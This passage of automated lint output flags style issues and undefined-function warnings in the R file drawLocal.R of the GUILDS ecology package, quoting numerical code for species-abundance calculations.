which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n^~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:21:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                   ^~~\n```\n[R/drawLocal.R:21:23:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                      ^\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:22:9:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:22:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                  ~^\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1 + 1)) {\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 <- (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:25:28:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                          ~^\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                     ^~~\n```\n[R/drawLocal.R:31:39:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L31) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                                      ^~~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                         ^\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                        ~^~\n```\n[R/drawLocal.R:41:60:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                                                          ~^~\n```\n[R/drawLocal.R:42:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:10:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *warning:* **no visible global function definition for ‘interp1’**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n         ^~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:27:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                         ~^~\n```\n[R/drawLocal.R:47:41:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                        ^~\n```\n[R/drawLocal.R:47:46:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                             ^~\n```\n[R/drawLocal.R:47:56:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                      ~^~\n```\n[R/drawLocal.R:47:75:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                         ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < eps()] <- eps()\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n               ~^\n```\n[R/drawLocal.R:51:26:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n                        ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n          ^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n         ~^~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:26:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                        ~^~\n```\n[R/drawLocal.R:56:42:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                                        ~^~\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx0=which(x==0);\n            ^\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx0=which(x==0);\n           ~^~\n```\n[R/drawLocal.R:58:11:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx0)) {\n          ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                    ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                   ~^~\n```\n[R/drawLocal.R:59:31:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                              ^~\n```\n[R/drawLocal.R:60:35:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                 ~^~\n```\n[R/drawLocal.R:60:39:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                     ~^~\n```\n[R/drawLocal.R:60:49:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                               ~^~\n```\n[R/drawLocal.R:61:37:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                   ~^~\n```\n[R/drawLocal.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                               ~^~\n```\n[R/drawLocal.R:61:51:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                 ~^~\n```\n[R/drawLocal.R:61:55:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                     ~^~\n```\n[R/drawLocal.R:62:25:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty[idx0] = aux;\n                        ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx1=which(x==1);\n            ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/d479751f14be8dd7e0464597dd8bcd6ac8779778/R/drawLocal.R#L64) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx1=which(x==1);\n           